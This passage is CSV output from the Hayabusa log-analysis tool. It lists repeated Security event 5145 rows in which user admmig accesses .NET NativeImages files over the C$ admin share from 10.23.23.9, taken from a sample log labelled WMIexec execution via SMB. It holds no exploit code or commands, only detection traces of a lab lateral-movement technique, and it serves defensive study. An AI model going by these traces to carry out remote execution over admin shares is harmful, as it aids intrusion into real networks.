10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 